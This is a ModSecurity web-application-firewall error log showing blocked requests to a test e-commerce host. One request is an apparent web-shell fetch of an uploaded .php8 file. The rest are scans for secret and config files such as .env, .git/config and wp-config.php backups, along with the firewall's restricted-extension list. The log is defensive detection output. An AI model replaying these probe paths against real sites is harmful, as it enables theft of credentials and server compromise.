https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 27 01:28:13.824402 2026] [:error] [pid 1679419] [client 213.109.225.211:34591] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/7/2788364f428d25.php8"] [unique_id "aXgGnRQXPIE7pMyWDPBkpAAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 27 01:28:13.824604 2026] [:error] [pid 1679419] [client 213.109.225.211:34591] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/7/2788364f428d25.php8"] [unique_id "aXgGnRQXPIE7pMyWDPBkpAAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 27 03:40:34.717900 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXglouyoYoxcYRb6neA8JgAAAAY"]
[Tue Jan 27 03:40:34.718144 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXglouyoYoxcYRb6neA8JgAAAAY"]
[Tue Jan 27 03:40:34.718297 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXglouyoYoxcYRb6neA8JgAAAAY"]
[Tue Jan 27 03:40:34.741175 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXglouyoYoxcYRb6neA8JwAAAAY"]
[Tue Jan 27 03:40:34.741356 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXglouyoYoxcYRb6neA8JwAAAAY"]
[Tue Jan 27 03:40:34.741495 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXglouyoYoxcYRb6neA8JwAAAAY"]
[Tue Jan 27 03:40:34.761911 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aXglouyoYoxcYRb6neA8KAAAAAY"]
[Tue Jan 27 03:40:34.762028 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aXglouyoYoxcYRb6neA8KAAAAAY"]
[Tue Jan 27 03:40:34.762180 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aXglouyoYoxcYRb6neA8KAAAAAY"]
[Tue Jan 27 03:40:34.762314 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aXglouyoYoxcYRb6neA8KAAAAAY"]
[Tue Jan 27 03:40:34.782810 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aXglouyoYoxcYRb6neA8KQAAAAY"]
[Tue Jan 27 03:40:34.782970 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aXglouyoYoxcYRb6neA8KQAAAAY"]
[Tue Jan 27 03:40:34.783104 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aXglouyoYoxcYRb6neA8KQAAAAY"]
[Tue Jan 27 03:40:34.803623 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXglouyoYoxcYRb6neA8KgAAAAY"]
[Tue Jan 27 03:40:34.803775 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXglouyoYoxcYRb6neA8KgAAAAY"]
[Tue Jan 27 03:40:34.803906 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXglouyoYoxcYRb6neA8KgAAAAY"]
[Tue Jan 27 03:40:34.824447 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXglouyoYoxcYRb6neA8KwAAAAY"]
[Tue Jan 27 03:40:34.824589 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXglouyoYoxcYRb6neA8KwAAAAY"]
[Tue Jan 27 03:40:34.824724 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXglouyoYoxcYRb6neA8KwAAAAY"]
[Tue Jan 27 03:40:34.845243 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aXglouyoYoxcYRb6neA8LAAAAAY"]
[Tue Jan 27 03:40:34.845405 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aXglouyoYoxcYRb6neA8LAAAAAY"]
[Tue Jan 27 03:40:34.845541 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aXglouyoYoxcYRb6neA8LAAAAAY"]
[Tue Jan 27 03:40:34.866713 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aXglouyoYoxcYRb6neA8LQAAAAY"]
[Tue Jan 27 03:40:34.866866 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aXglouyoYoxcYRb6neA8LQAAAAY"]
[Tue Jan 27 03:40:34.867008 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aXglouyoYoxcYRb6neA8LQAAAAY"]
[Tue Jan 27 03:40:34.887526 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXglouyoYoxcYRb6neA8LgAAAAY"]
[Tue Jan 27 03:40:34.887637 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXglouyoYoxcYRb6neA8LgAAAAY"]
[Tue Jan 27 03:40:34.887781 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXglouyoYoxcYRb6neA8LgAAAAY"]
[Tue Jan 27 03:40:34.887910 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXglouyoYoxcYRb6neA8LgAAAAY"]
[Tue Jan 27 03:40:34.930030 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "aXglouyoYoxcYRb6neA8MAAAAAY"]
[Tue Jan 27 03:40:34.930271 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "aXglouyoYoxcYRb6neA8MAAAAAY"]
[Tue Jan 27 03:40:34.930430 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "aXglouyoYoxcYRb6neA8MAAAAAY"]
[Tue Jan 27 03:40:35.016118 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aXglo-yoYoxcYRb6neA8NAAAAAY"]
[Tue Jan 27 03:40:35.016269 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aXglo-yoYoxcYRb6neA8NAAAAAY"]
[Tue Jan 27 03:40:35.016409 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aXglo-yoYoxcYRb6neA8NAAAAAY"]
[Tue Jan 27 03:40:35.039417 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aXglo-yoYoxcYRb6neA8NQAAAAY"]
